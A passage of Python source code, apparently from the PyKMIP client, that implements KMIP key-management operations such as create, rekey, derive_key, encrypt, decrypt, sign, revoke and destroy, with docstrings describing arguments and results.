"The response message does not match the request operation."
)
# TODO (peterhamilton) Same as above for now.
if batch_item.operation.value == enums.Operation.DELETE_ATTRIBUTE:
if not isinstance(
batch_item.response_payload,
payloads.DeleteAttributeResponsePayload
):
raise exceptions.InvalidMessage(
"Invalid response payload received for the "
"DeleteAttribute operation."
)
elif batch_item.operation.value == enums.Operation.SET_ATTRIBUTE:
if not isinstance(
batch_item.response_payload,
payloads.SetAttributeResponsePayload
):
raise exceptions.InvalidMessage(
"Invalid response payload received for the SetAttribute "
"operation."
)
elif batch_item.operation.value == enums.Operation.MODIFY_ATTRIBUTE:
if not isinstance(
batch_item.response_payload,
payloads.ModifyAttributeResponsePayload
):
raise exceptions.InvalidMessage(
"Invalid response payload received for the "
"ModifyAttribute operation."
)
return batch_item.response_payload
def create(self, object_type, template_attribute, credential=None):
return self._create(object_type=object_type,
template_attribute=template_attribute,
credential=credential)
def create_key_pair(self, batch=False, common_template_attribute=None,
private_key_template_attribute=None,
public_key_template_attribute=None, credential=None):
batch_item = self._build_create_key_pair_batch_item(
common_template_attribute, private_key_template_attribute,
public_key_template_attribute)
if batch:
self.batch_items.append(batch_item)
else:
request = self._build_request_message(credential, [batch_item])
response = self._send_and_receive_message(request)
results = self._process_batch_items(response)
return results[0]
def activate(self, uuid=None, credential=None):
"""
Send an Activate request to the server.
Args:
uuid (string): The unique identifier of a managed cryptographic
object that should be activated.
credential (Credential): A Credential object containing
authentication information for the server. Optional, defaults
to None.
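        Example:
            Illustrative only; '1' stands in for the ID of a real managed
            object on the server:
            >>> client.activate(uuid='1')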
"""
return self._activate(uuid, credential=credential)
def rekey(self,
uuid=None,
offset=None,
template_attribute=None,
credential=None):
"""
        Rekey an existing managed object, generating a replacement object.
Args:
uuid (string): The unique identifier of a managed cryptographic
object that should be checked. Optional, defaults to None.
offset (int): An integer specifying, in seconds, the difference
between the rekeyed objects initialization date and activation
date. Optional, defaults to None.
template_attribute (TemplateAttribute): A TemplateAttribute struct
containing the attributes to set on the newly rekeyed object.
Optional, defaults to None.
credential (Credential): A Credential struct containing a set of
authorization parameters for the operation. Optional, defaults
to None.
Returns:
            dict: The results of the rekey operation, containing the following
key/value pairs:
Key | Value
---------------------------|-----------------------------------
'unique_identifier' | (string) The unique ID of the
                                           | newly rekeyed object.
'template_attribute' | (TemplateAttribute) A struct
| containing attribute set by the
| server. Optional.
'result_status' | (ResultStatus) An enumeration
| indicating the status of the
| operation result.
'result_reason' | (ResultReason) An enumeration
| providing context for the result
| status.
'result_message' | (string) A message providing
| additional context for the
| operation result.
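        Example:
            Illustrative only; '1' is a placeholder for the ID of an
            existing symmetric key:
            >>> result = client.rekey(uuid='1', offset=0)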
"""
operation = Operation(OperationEnum.REKEY)
request_payload = payloads.RekeyRequestPayload(
unique_identifier=uuid,
offset=offset,
template_attribute=template_attribute
)
batch_item = messages.RequestBatchItem(
operation=operation,
request_payload=request_payload
)
request = self._build_request_message(credential, [batch_item])
response = self._send_and_receive_message(request)
batch_item = response.batch_items[0]
payload = batch_item.response_payload
result = {}
if payload:
result['unique_identifier'] = payload.unique_identifier
if payload.template_attribute is not None:
result['template_attribute'] = payload.template_attribute
result['result_status'] = batch_item.result_status.value
try:
result['result_reason'] = batch_item.result_reason.value
except Exception:
result['result_reason'] = batch_item.result_reason
try:
result['result_message'] = batch_item.result_message.value
except Exception:
result['result_message'] = batch_item.result_message
return result
def derive_key(self,
object_type,
unique_identifiers,
derivation_method,
derivation_parameters,
template_attribute,
credential=None):
"""
Derive a new key or secret data from an existing managed object.
Args:
object_type (ObjectType): An ObjectType enumeration specifying
what type of object to create. Required.
unique_identifiers (list): A list of strings specifying the unique
IDs of the existing managed objects to use for key derivation.
Required.
derivation_method (DerivationMethod): A DerivationMethod
enumeration specifying what key derivation method to use.
Required.
derivation_parameters (DerivationParameters): A
DerivationParameters struct containing the settings and
options to use for key derivation.
template_attribute (TemplateAttribute): A TemplateAttribute struct
containing the attributes to set on the newly derived object.
credential (Credential): A Credential struct containing a set of
authorization parameters for the operation. Optional, defaults
to None.
Returns:
dict: The results of the derivation operation, containing the
following key/value pairs:
Key | Value
---------------------|-----------------------------------------
'unique_identifier' | (string) The unique ID of the newly
| derived object.
'template_attribute' | (TemplateAttribute) A struct containing
| any attributes set on the newly derived
| object.
'result_status' | (ResultStatus) An enumeration indicating
| the status of the operation result.
'result_reason' | (ResultReason) An enumeration providing
| context for the result status.
'result_message' | (string) A message providing additional
| context for the operation result.
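        Example:
            A minimal sketch; assumes ``params`` is a pre-built
            DerivationParameters struct and ``template`` is a
            TemplateAttribute describing the derived key:
            >>> result = client.derive_key(
            ...     enums.ObjectType.SYMMETRIC_KEY,
            ...     ['1'],
            ...     enums.DerivationMethod.HMAC,
            ...     params,
            ...     template)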
"""
operation = Operation(OperationEnum.DERIVE_KEY)
request_payload = payloads.DeriveKeyRequestPayload(
object_type=object_type,
unique_identifiers=unique_identifiers,
derivation_method=derivation_method,
derivation_parameters=derivation_parameters,
template_attribute=template_attribute
)
batch_item = messages.RequestBatchItem(
operation=operation,
request_payload=request_payload
)
request = self._build_request_message(credential, [batch_item])
response = self._send_and_receive_message(request)
batch_item = response.batch_items[0]
payload = batch_item.response_payload
result = {}
if payload:
result['unique_identifier'] = payload.unique_identifier
result['template_attribute'] = payload.template_attribute
result['result_status'] = batch_item.result_status.value
try:
result['result_reason'] = batch_item.result_reason.value
except Exception:
result['result_reason'] = batch_item.result_reason
try:
result['result_message'] = batch_item.result_message.value
except Exception:
result['result_message'] = batch_item.result_message
return result
def check(self,
uuid=None,
usage_limits_count=None,
cryptographic_usage_mask=None,
lease_time=None,
credential=None):
"""
Check object usage according to specific constraints.
Args:
uuid (string): The unique identifier of a managed cryptographic
object that should be checked. Optional, defaults to None.
usage_limits_count (int): An integer specifying the number of
items that can be secured with the specified cryptographic
object. Optional, defaults to None.
cryptographic_usage_mask (list): A list of CryptographicUsageMask
enumerations specifying the operations possible with the
specified cryptographic object. Optional, defaults to None.
lease_time (int): The number of seconds that can be leased for the
specified cryptographic object. Optional, defaults to None.
credential (Credential): A Credential struct containing a set of
authorization parameters for the operation. Optional, defaults
to None.
Returns:
dict: The results of the check operation, containing the following
key/value pairs:
Key | Value
---------------------------|-----------------------------------
'unique_identifier' | (string) The unique ID of the
| checked cryptographic object.
'usage_limits_count' | (int) The value provided as input
| if the value exceeds server
| constraints.
'cryptographic_usage_mask' | (list) The value provided as input
| if the value exceeds server
| constraints.
'lease_time' | (int) The value provided as input
| if the value exceeds server
| constraints.
'result_status' | (ResultStatus) An enumeration
| indicating the status of the
| operation result.
'result_reason' | (ResultReason) An enumeration
| providing context for the result
| status.
'result_message' | (string) A message providing
| additional context for the
| operation result.
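        Example:
            Illustrative only; '1' is a placeholder for the ID of an
            existing key:
            >>> result = client.check(
            ...     uuid='1',
            ...     usage_limits_count=50,
            ...     cryptographic_usage_mask=[
            ...         enums.CryptographicUsageMask.ENCRYPT
            ...     ])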
"""
# TODO (peter-hamilton) Push this into the Check request.
        mask = None
        if cryptographic_usage_mask:
            mask = 0
            for m in cryptographic_usage_mask:
                mask |= m.value
operation = Operation(OperationEnum.CHECK)
request_payload = payloads.CheckRequestPayload(
unique_identifier=uuid,
usage_limits_count=usage_limits_count,
cryptographic_usage_mask=mask,
lease_time=lease_time
)
batch_item = messages.RequestBatchItem(
operation=operation,
request_payload=request_payload
)
request = self._build_request_message(credential, [batch_item])
response = self._send_and_receive_message(request)
batch_item = response.batch_items[0]
payload = batch_item.response_payload
result = {}
if payload:
result['unique_identifier'] = payload.unique_identifier
if payload.usage_limits_count is not None:
result['usage_limits_count'] = payload.usage_limits_count
if payload.cryptographic_usage_mask is not None:
# TODO (peter-hamilton) Push this into the Check response.
masks = []
for enumeration in enums.CryptographicUsageMask:
if payload.cryptographic_usage_mask & enumeration.value:
masks.append(enumeration)
result['cryptographic_usage_mask'] = masks
if payload.lease_time is not None:
result['lease_time'] = payload.lease_time
result['result_status'] = batch_item.result_status.value
try:
result['result_reason'] = batch_item.result_reason.value
except Exception:
result['result_reason'] = batch_item.result_reason
try:
result['result_message'] = batch_item.result_message.value
except Exception:
result['result_message'] = batch_item.result_message
return result
def get(self, uuid=None, key_format_type=None, key_compression_type=None,
key_wrapping_specification=None, credential=None):
return self._get(
unique_identifier=uuid,
key_format_type=key_format_type,
key_compression_type=key_compression_type,
key_wrapping_specification=key_wrapping_specification,
credential=credential)
def get_attributes(self, uuid=None, attribute_names=None):
"""
Send a GetAttributes request to the server.
Args:
uuid (string): The ID of the managed object with which the
retrieved attributes should be associated. Optional, defaults
to None.
attribute_names (list): A list of AttributeName values indicating
what object attributes the client wants from the server.
Optional, defaults to None.
Returns:
result (GetAttributesResult): A structure containing the results
of the operation.
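        Example:
            Illustrative only; assumes attribute names are passed as plain
            strings and '1' is the ID of an existing object:
            >>> result = client.get_attributes(
            ...     uuid='1',
            ...     attribute_names=['Cryptographic Algorithm', 'State'])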
"""
batch_item = self._build_get_attributes_batch_item(
uuid,
attribute_names
)
request = self._build_request_message(None, [batch_item])
response = self._send_and_receive_message(request)
results = self._process_batch_items(response)
return results[0]
def get_attribute_list(self, uid=None):
"""
Send a GetAttributeList request to the server.
Args:
uid (string): The ID of the managed object with which the retrieved
attribute names should be associated.
Returns:
result (GetAttributeListResult): A structure containing the results
of the operation.
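        Example:
            Illustrative only; '1' stands in for a real object ID:
            >>> result = client.get_attribute_list('1')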
"""
batch_item = self._build_get_attribute_list_batch_item(uid)
request = self._build_request_message(None, [batch_item])
response = self._send_and_receive_message(request)
results = self._process_batch_items(response)
return results[0]
def revoke(self, revocation_reason, uuid=None, revocation_message=None,
compromise_occurrence_date=None, credential=None):
return self._revoke(
unique_identifier=uuid,
revocation_reason=revocation_reason,
revocation_message=revocation_message,
compromise_occurrence_date=compromise_occurrence_date,
credential=credential)
def destroy(self, uuid=None, credential=None):
return self._destroy(unique_identifier=uuid,
credential=credential)
def register(self, object_type, template_attribute, secret,
credential=None):
return self._register(object_type=object_type,
template_attribute=template_attribute,
secret=secret,
credential=credential)
def rekey_key_pair(self, batch=False, private_key_uuid=None, offset=None,
common_template_attribute=None,
private_key_template_attribute=None,
public_key_template_attribute=None, credential=None):
batch_item = self._build_rekey_key_pair_batch_item(
private_key_uuid, offset, common_template_attribute,
private_key_template_attribute, public_key_template_attribute)
if batch:
self.batch_items.append(batch_item)
else:
request = self._build_request_message(credential, [batch_item])
response = self._send_and_receive_message(request)
results = self._process_batch_items(response)
return results[0]
def locate(self, maximum_items=None, storage_status_mask=None,
object_group_member=None, attributes=None, credential=None,
offset_items=None):
return self._locate(maximum_items=maximum_items,
storage_status_mask=storage_status_mask,
object_group_member=object_group_member,
attributes=attributes, credential=credential,
offset_items=offset_items)
def query(self, batch=False, query_functions=None, credential=None):
"""
Send a Query request to the server.
Args:
batch (boolean): A flag indicating if the operation should be sent
with a batch of additional operations. Defaults to False.
query_functions (list): A list of QueryFunction enumerations
indicating what information the client wants from the server.
Optional, defaults to None.
credential (Credential): A Credential object containing
authentication information for the server. Optional, defaults
to None.
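        Example:
            Illustrative only; assumes each entry is a
            kmip.core.misc.QueryFunction struct wrapping a QueryFunction
            enumeration:
            >>> from kmip.core import misc
            >>> result = client.query(query_functions=[
            ...     misc.QueryFunction(enums.QueryFunction.QUERY_OPERATIONS)])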
"""
batch_item = self._build_query_batch_item(query_functions)
# TODO (peter-hamilton): Replace this with official client batch mode.
if batch:
self.batch_items.append(batch_item)
else:
request = self._build_request_message(credential, [batch_item])
response = self._send_and_receive_message(request)
results = self._process_batch_items(response)
return results[0]
def discover_versions(self, batch=False, protocol_versions=None,
credential=None):
batch_item = self._build_discover_versions_batch_item(
protocol_versions)
if batch:
self.batch_items.append(batch_item)
else:
request = self._build_request_message(credential, [batch_item])
response = self._send_and_receive_message(request)
results = self._process_batch_items(response)
return results[0]
def encrypt(self,
data,
unique_identifier=None,
cryptographic_parameters=None,
iv_counter_nonce=None,
credential=None):
"""
Encrypt data using the specified encryption key and parameters.
Args:
data (bytes): The bytes to encrypt. Required.
unique_identifier (string): The unique ID of the encryption key
to use. Optional, defaults to None.
cryptographic_parameters (CryptographicParameters): A structure
containing various cryptographic settings to be used for the
encryption. Optional, defaults to None.
iv_counter_nonce (bytes): The bytes to use for the IV/counter/
nonce, if needed by the encryption algorithm and/or cipher
mode. Optional, defaults to None.
credential (Credential): A credential object containing a set of
authorization parameters for the operation. Optional, defaults
to None.
Returns:
dict: The results of the encrypt operation, containing the
following key/value pairs:
Key | Value
--------------------|-----------------------------------------
'unique_identifier' | (string) The unique ID of the encryption
| key used to encrypt the data.
'data' | (bytes) The encrypted data.
'iv_counter_nonce' | (bytes) The IV/counter/nonce used for
| the encryption, if autogenerated.
'result_status' | (ResultStatus) An enumeration indicating
| the status of the operation result.
'result_reason' | (ResultReason) An enumeration providing
| context for the result status.
'result_message' | (string) A message providing additional
| context for the operation result.
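        Example:
            A minimal sketch; '1' is a placeholder for the ID of a symmetric
            key that allows encryption:
            >>> result = client.encrypt(
            ...     b'Secret message.!',
            ...     unique_identifier='1')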
"""
operation = Operation(OperationEnum.ENCRYPT)
request_payload = payloads.EncryptRequestPayload(
unique_identifier=unique_identifier,
data=data,
cryptographic_parameters=cryptographic_parameters,
iv_counter_nonce=iv_counter_nonce
)
batch_item = messages.RequestBatchItem(
operation=operation,
request_payload=request_payload
)
request = self._build_request_message(credential, [batch_item])
response = self._send_and_receive_message(request)
batch_item = response.batch_items[0]
payload = batch_item.response_payload
result = {}
if payload:
result['unique_identifier'] = payload.unique_identifier
result['data'] = payload.data
result['iv_counter_nonce'] = payload.iv_counter_nonce
result['result_status'] = batch_item.result_status.value
try:
result['result_reason'] = batch_item.result_reason.value
except Exception:
result['result_reason'] = batch_item.result_reason
try:
result['result_message'] = batch_item.result_message.value
except Exception:
result['result_message'] = batch_item.result_message
return result
def decrypt(self,
data,
unique_identifier=None,
cryptographic_parameters=None,
iv_counter_nonce=None,
credential=None):
"""
Decrypt data using the specified decryption key and parameters.
Args:
data (bytes): The bytes to decrypt. Required.
unique_identifier (string): The unique ID of the decryption key
to use. Optional, defaults to None.
cryptographic_parameters (CryptographicParameters): A structure
containing various cryptographic settings to be used for the
decryption. Optional, defaults to None.
iv_counter_nonce (bytes): The bytes to use for the IV/counter/
nonce, if needed by the decryption algorithm and/or cipher
mode. Optional, defaults to None.
credential (Credential): A credential object containing a set of
authorization parameters for the operation. Optional, defaults
to None.
Returns:
dict: The results of the decrypt operation, containing the
following key/value pairs:
Key | Value
--------------------|-----------------------------------------
'unique_identifier' | (string) The unique ID of the decryption
| key used to decrypt the data.
'data' | (bytes) The decrypted data.
'result_status' | (ResultStatus) An enumeration indicating
| the status of the operation result.
'result_reason' | (ResultReason) An enumeration providing
| context for the result status.
'result_message' | (string) A message providing additional
| context for the operation result.
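        Example:
            A minimal sketch; assumes ``ciphertext`` holds bytes previously
            produced by the encrypt operation with key '1':
            >>> result = client.decrypt(
            ...     ciphertext,
            ...     unique_identifier='1')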
"""
operation = Operation(OperationEnum.DECRYPT)
request_payload = payloads.DecryptRequestPayload(
unique_identifier=unique_identifier,
data=data,
cryptographic_parameters=cryptographic_parameters,
iv_counter_nonce=iv_counter_nonce
)
batch_item = messages.RequestBatchItem(
operation=operation,
request_payload=request_payload
)
request = self._build_request_message(credential, [batch_item])
response = self._send_and_receive_message(request)
batch_item = response.batch_items[0]
payload = batch_item.response_payload
result = {}
if payload:
result['unique_identifier'] = payload.unique_identifier
result['data'] = payload.data
result['result_status'] = batch_item.result_status.value
try:
result['result_reason'] = batch_item.result_reason.value
except Exception:
result['result_reason'] = batch_item.result_reason
try:
result['result_message'] = batch_item.result_message.value
except Exception:
result['result_message'] = batch_item.result_message
return result
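    # Illustrative usage sketch (not part of the original source; `client`,
    # `ciphertext` and `iv` are hypothetical, and the key ID must exist):
    #
    #   result = client.decrypt(ciphertext, unique_identifier='1',
    #                           iv_counter_nonce=iv)
    #   plaintext = result['data']  # only meaningful on a successful result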
def signature_verify(self,
message,
signature,
unique_identifier=None,
cryptographic_parameters=None,
credential=None):
"""
Verify a message signature using the specified signing key.
Args:
message (bytes): The bytes of the signed message. Required.
signature (bytes): The bytes of the message signature. Required.
unique_identifier (string): The unique ID of the signing key to
use. Optional, defaults to None.
cryptographic_parameters (CryptographicParameters): A structure
containing various cryptographic settings to be used for
signature verification. Optional, defaults to None.
credential (Credential): A credential object containing a set of
authorization parameters for the operation. Optional, defaults
to None.
Returns:
dict: The results of the signature verify operation, containing the
following key/value pairs:
Key | Value
---------------------|-----------------------------------------
'unique_identifier' | (string) The unique ID of the signing
| key used to verify the signature.
'validity_indicator' | (ValidityIndicator) An enumeration
| indicating the result of signature
| verification.
'result_status' | (ResultStatus) An enumeration indicating
| the status of the operation result.
'result_reason' | (ResultReason) An enumeration providing
| context for the result status.
'result_message' | (string) A message providing additional
| context for the operation result.
"""
operation = Operation(OperationEnum.SIGNATURE_VERIFY)
request_payload = payloads.SignatureVerifyRequestPayload(
unique_identifier=unique_identifier,
cryptographic_parameters=cryptographic_parameters,
data=message,
signature_data=signature
)
batch_item = messages.RequestBatchItem(
operation=operation,
request_payload=request_payload
)
request = self._build_request_message(credential, [batch_item])
response = self._send_and_receive_message(request)
batch_item = response.batch_items[0]
payload = batch_item.response_payload
result = {}
if payload:
result['unique_identifier'] = payload.unique_identifier
result['validity_indicator'] = payload.validity_indicator
result['result_status'] = batch_item.result_status.value
try:
result['result_reason'] = batch_item.result_reason.value
except Exception:
result['result_reason'] = batch_item.result_reason
try:
result['result_message'] = batch_item.result_message.value
except Exception:
result['result_message'] = batch_item.result_message
return result
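    # Illustrative usage sketch (not part of the original source; `client`,
    # `message` and `signature` are hypothetical values):
    #
    #   result = client.signature_verify(message, signature,
    #                                    unique_identifier='1')
    #   indicator = result['validity_indicator']  # VALID / INVALID / UNKNOWN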
def sign(self, data, unique_identifier=None,
cryptographic_parameters=None, credential=None):
"""
Sign specified data using a specified signing key.
Args:
data (bytes): Data to be signed. Required.
unique_identifier (string): The unique ID of the signing
key to be used. Optional, defaults to None.
cryptographic_parameters (CryptographicParameters): A structure
containing various cryptographic settings to be used for
creating the signature. Optional, defaults to None.
credential (Credential): A credential object containing a set of
authorization parameters for the operation. Optional, defaults
to None.
Returns:
dict: The results of the sign operation, containing the
following key/value pairs:
Key | Value
---------------------|-----------------------------------------
'unique_identifier' | (string) The unique ID of the signing
| key used to create the signature
'signature' | (bytes) The bytes of the signature
'result_status' | (ResultStatus) An enumeration indicating
| the status of the operation result
'result_reason' | (ResultReason) An enumeration providing
| context for the result status.
'result_message' | (string) A message providing additional
| context for the operation result.
"""
operation = Operation(OperationEnum.SIGN)
request_payload = payloads.SignRequestPayload(
unique_identifier=unique_identifier,
cryptographic_parameters=cryptographic_parameters,
data=data
)
batch_item = messages.RequestBatchItem(
operation=operation,
request_payload=request_payload
)
request = self._build_request_message(credential, [batch_item])
response = self._send_and_receive_message(request)
batch_item = response.batch_items[0]
payload = batch_item.response_payload
result = {}
if payload:
result['unique_identifier'] = payload.unique_identifier
result['signature'] = payload.signature_data
result['result_status'] = batch_item.result_status.value
try:
result['result_reason'] = batch_item.result_reason.value
except Exception:
result['result_reason'] = batch_item.result_reason
try:
result['result_message'] = batch_item.result_message.value
except Exception:
result['result_message'] = batch_item.result_message
return result
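    # Illustrative usage sketch (not part of the original source; `client` and
    # `data` are hypothetical, and the signing key ID must already exist):
    #
    #   result = client.sign(data, unique_identifier='1')
    #   signature = result['signature']  # signature bytes on success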
def mac(self, data, unique_identifier=None,
cryptographic_parameters=None, credential=None):
return self._mac(
data=data,
unique_identifier=unique_identifier,
cryptographic_parameters=cryptographic_parameters,
credential=credential)
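    # Illustrative usage sketch (not part of the original source; `client` and
    # `data` are hypothetical, and the MAC key ID must already exist):
    #
    #   result = client.mac(data, unique_identifier='1')
    #   # `result` is a MACResult built by _mac() below, carrying the result
    #   # status, the key ID and the computed MAC bytes.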
def _create(self,
object_type=None,
template_attribute=None,
credential=None):
operation = Operation(OperationEnum.CREATE)
if object_type is None:
raise ValueError('object_type cannot be None')
req_pl = payloads.CreateRequestPayload(
object_type=object_type,
template_attribute=template_attribute)
batch_item = messages.RequestBatchItem(operation=operation,
request_payload=req_pl)
message = self._build_request_message(credential, [batch_item])
self._send_message(message)
message = messages.ResponseMessage()
data = self._receive_message()
message.read(data, self.kmip_version)
batch_items = message.batch_items
batch_item = batch_items[0]
payload = batch_item.response_payload
if payload is None:
payload_unique_identifier = None
payload_template_attribute = None
payload_object_type = None
else:
payload_unique_identifier = payload.unique_identifier
payload_template_attribute = payload.template_attribute
payload_object_type = payload.object_type
result = CreateResult(batch_item.result_status,
batch_item.result_reason,
batch_item.result_message,
payload_object_type,
payload_unique_identifier,
payload_template_attribute)
return result
def _build_create_key_pair_batch_item(self, common_template_attribute=None,
private_key_template_attribute=None,
public_key_template_attribute=None):
operation = Operation(OperationEnum.CREATE_KEY_PAIR)
payload = payloads.CreateKeyPairRequestPayload(
common_template_attribute=common_template_attribute,
private_key_template_attribute=private_key_template_attribute,
public_key_template_attribute=public_key_template_attribute)
batch_item = messages.RequestBatchItem(
operation=operation, request_payload=payload)
return batch_item
def _build_rekey_key_pair_batch_item(self,
private_key_uuid=None, offset=None,
common_template_attribute=None,
private_key_template_attribute=None,
public_key_template_attribute=None):
operation = Operation(OperationEnum.REKEY_KEY_PAIR)
payload = payloads.RekeyKeyPairRequestPayload(
private_key_uuid, offset,
common_template_attribute=common_template_attribute,
private_key_template_attribute=private_key_template_attribute,
public_key_template_attribute=public_key_template_attribute)
batch_item = messages.RequestBatchItem(
operation=operation, request_payload=payload)
return batch_item
def _build_query_batch_item(self, query_functions=None):
operation = Operation(OperationEnum.QUERY)
payload = payloads.QueryRequestPayload(query_functions)
batch_item = messages.RequestBatchItem(
operation=operation, request_payload=payload)
return batch_item
def _build_get_attributes_batch_item(
self,
uuid=None,
attribute_names=None
):
operation = Operation(OperationEnum.GET_ATTRIBUTES)
payload = payloads.GetAttributesRequestPayload(
uuid,
attribute_names
)
batch_item = messages.RequestBatchItem(
operation=operation,
request_payload=payload
)
return batch_item
def _build_get_attribute_list_batch_item(self, uid=None):
operation = Operation(OperationEnum.GET_ATTRIBUTE_LIST)
payload = payloads.GetAttributeListRequestPayload(uid)
batch_item = messages.RequestBatchItem(
operation=operation, request_payload=payload)
return batch_item
def _build_discover_versions_batch_item(self, protocol_versions=None):
operation = Operation(OperationEnum.DISCOVER_VERSIONS)
payload = payloads.DiscoverVersionsRequestPayload(
protocol_versions)
batch_item = messages.RequestBatchItem(
operation=operation, request_payload=payload)
return batch_item
def _process_batch_items(self, response):
results = []
for batch_item in response.batch_items:
operation = None
if batch_item.operation is not None:
operation = batch_item.operation.value
processor = self._get_batch_item_processor(operation)
result = processor(batch_item)
results.append(result)
return results
def _get_batch_item_processor(self, operation):
if operation is None:
return self._process_response_error
elif operation == OperationEnum.CREATE_KEY_PAIR:
return self._process_create_key_pair_batch_item
elif operation == OperationEnum.GET_ATTRIBUTES:
return self._process_get_attributes_batch_item
elif operation == OperationEnum.GET_ATTRIBUTE_LIST:
return self._process_get_attribute_list_batch_item
elif operation == OperationEnum.REKEY_KEY_PAIR:
return self._process_rekey_key_pair_batch_item
elif operation == OperationEnum.QUERY:
return self._process_query_batch_item
elif operation == OperationEnum.DISCOVER_VERSIONS:
return self._process_discover_versions_batch_item
else:
raise ValueError("no processor for operation: {0}".format(
operation))
def _process_get_attributes_batch_item(self, batch_item):
payload = batch_item.response_payload
uuid = None
attributes = None
if payload:
uuid = payload.unique_identifier
attributes = payload.attributes
return GetAttributesResult(
batch_item.result_status,
batch_item.result_reason,
batch_item.result_message,
uuid,
attributes
)
def _process_get_attribute_list_batch_item(self, batch_item):
payload = batch_item.response_payload
uid = None
names = None
if payload:
uid = payload.unique_identifier
names = payload.attribute_names
return GetAttributeListResult(
batch_item.result_status,
batch_item.result_reason,
batch_item.result_message,
uid,
names)
def _process_key_pair_batch_item(self, batch_item, result):
payload = batch_item.response_payload
payload_private_key_uuid = None
payload_public_key_uuid = None
payload_private_key_template_attribute = None
payload_public_key_template_attribute = None
if payload is not None:
payload_private_key_uuid = payload.private_key_unique_identifier
payload_public_key_uuid = payload.public_key_unique_identifier
payload_private_key_template_attribute = \
payload.private_key_template_attribute
payload_public_key_template_attribute = \
payload.public_key_template_attribute
return result(batch_item.result_status, batch_item.result_reason,
batch_item.result_message, payload_private_key_uuid,
payload_public_key_uuid,
payload_private_key_template_attribute,
payload_public_key_template_attribute)
def _process_create_key_pair_batch_item(self, batch_item):
return self._process_key_pair_batch_item(
batch_item, CreateKeyPairResult)
def _process_rekey_key_pair_batch_item(self, batch_item):
return self._process_key_pair_batch_item(
batch_item, RekeyKeyPairResult)
def _process_query_batch_item(self, batch_item):
payload = batch_item.response_payload
operations = None
object_types = None
vendor_identification = None
server_information = None
application_namespaces = None
extension_information = None
if payload is not None:
operations = payload.operations
object_types = payload.object_types
vendor_identification = payload.vendor_identification
server_information = payload.server_information
application_namespaces = payload.application_namespaces
extension_information = payload.extension_information
return QueryResult(
batch_item.result_status,
batch_item.result_reason,
batch_item.result_message,
operations,
object_types,
vendor_identification,
server_information,
application_namespaces,
extension_information)
def _process_discover_versions_batch_item(self, batch_item):
payload = batch_item.response_payload
result = DiscoverVersionsResult(
batch_item.result_status, batch_item.result_reason,
batch_item.result_message, payload.protocol_versions)
return result
def _process_response_error(self, batch_item):
result = OperationResult(
batch_item.result_status, batch_item.result_reason,
batch_item.result_message)
return result
def _get(self,
unique_identifier=None,
key_format_type=None,
key_compression_type=None,
key_wrapping_specification=None,
credential=None):
operation = Operation(OperationEnum.GET)
if key_format_type is not None:
key_format_type = key_format_type.value
req_pl = payloads.GetRequestPayload(
unique_identifier=unique_identifier,
key_format_type=key_format_type,
key_compression_type=key_compression_type,
key_wrapping_specification=key_wrapping_specification
)
batch_item = messages.RequestBatchItem(operation=operation,
request_payload=req_pl)
message = self._build_request_message(credential, [batch_item])
self._send_message(message)
message = messages.ResponseMessage()
data = self._receive_message()
message.read(data, self.kmip_version)
batch_items = message.batch_items
batch_item = batch_items[0]
payload = batch_item.response_payload
if payload is None:
payload_unique_identifier = None
payload_object_type = None
payload_secret = None
else:
payload_unique_identifier = payload.unique_identifier
payload_object_type = payload.object_type
payload_secret = payload.secret
result = GetResult(batch_item.result_status,
batch_item.result_reason,
batch_item.result_message,
payload_object_type,
payload_unique_identifier,
payload_secret)
return result
def _activate(self, unique_identifier=None, credential=None):
operation = Operation(OperationEnum.ACTIVATE)
uuid = None
if unique_identifier is not None:
uuid = attr.UniqueIdentifier(unique_identifier)
payload = payloads.ActivateRequestPayload(unique_identifier=uuid)
batch_item = messages.RequestBatchItem(operation=operation,
request_payload=payload)
message = self._build_request_message(credential, [batch_item])
self._send_message(message)
message = messages.ResponseMessage()
data = self._receive_message()
message.read(data, self.kmip_version)
batch_items = message.batch_items
batch_item = batch_items[0]
payload = batch_item.response_payload
if payload is None:
payload_unique_identifier = None
else:
payload_unique_identifier = payload.unique_identifier
result = ActivateResult(batch_item.result_status,
batch_item.result_reason,
batch_item.result_message,
payload_unique_identifier)
return result
def _destroy(self,
unique_identifier=None,
credential=None):
operation = Operation(OperationEnum.DESTROY)
uuid = None
if unique_identifier is not None:
uuid = attr.UniqueIdentifier(unique_identifier)
payload = payloads.DestroyRequestPayload(unique_identifier=uuid)
batch_item = messages.RequestBatchItem(operation=operation,
request_payload=payload)
message = self._build_request_message(credential, [batch_item])
self._send_message(message)
message = messages.ResponseMessage()
data = self._receive_message()
message.read(data, self.kmip_version)
batch_items = message.batch_items
batch_item = batch_items[0]
payload = batch_item.response_payload
if payload is None:
payload_unique_identifier = None
else:
payload_unique_identifier = payload.unique_identifier
result = DestroyResult(batch_item.result_status,
batch_item.result_reason,
batch_item.result_message,
payload_unique_identifier)
return result
def _revoke(self, unique_identifier=None, revocation_reason=None,
revocation_message=None, compromise_occurrence_date=None,
credential=None):
operation = Operation(OperationEnum.REVOKE)
reason = objects.RevocationReason(code=revocation_reason,
message=revocation_message)
uuid = None
if unique_identifier is not None:
uuid = attr.UniqueIdentifier(unique_identifier)
payload = payloads.RevokeRequestPayload(
unique_identifier=uuid,
revocation_reason=reason,
compromise_occurrence_date=compromise_occurrence_date)
batch_item = messages.RequestBatchItem(operation=operation,
request_payload=payload)
message = self._build_request_message(credential, [batch_item])
self._send_message(message)
message = messages.ResponseMessage()
data = self._receive_message()
message.read(data, self.kmip_version)
batch_items = message.batch_items
batch_item = batch_items[0]
payload = batch_item.response_payload
if payload is None:
payload_unique_identifier = None
else:
payload_unique_identifier = payload.unique_identifier
result = RevokeResult(batch_item.result_status,
batch_item.result_reason,
batch_item.result_message,
payload_unique_identifier)
return result
def _register(self,
object_type=None,
template_attribute=None,
secret=None,
credential=None):
operation = Operation(OperationEnum.REGISTER)
if object_type is None:
raise ValueError('object_type cannot be None')
req_pl = payloads.RegisterRequestPayload(
object_type=object_type,
template_attribute=template_attribute,
managed_object=secret)
batch_item = messages.RequestBatchItem(operation=operation,
request_payload=req_pl)
message = self._build_request_message(credential, [batch_item])
self._send_message(message)
message = messages.ResponseMessage()
data = self._receive_message()
message.read(data, self.kmip_version)
batch_items = message.batch_items
batch_item = batch_items[0]
payload = batch_item.response_payload
if payload is None:
payload_unique_identifier = None
payload_template_attribute = None
else:
payload_unique_identifier = payload.unique_identifier
payload_template_attribute = payload.template_attribute
result = RegisterResult(batch_item.result_status,
batch_item.result_reason,
batch_item.result_message,
payload_unique_identifier,
payload_template_attribute)
return result
def _locate(self, maximum_items=None, storage_status_mask=None,
object_group_member=None, attributes=None, credential=None,
offset_items=None):
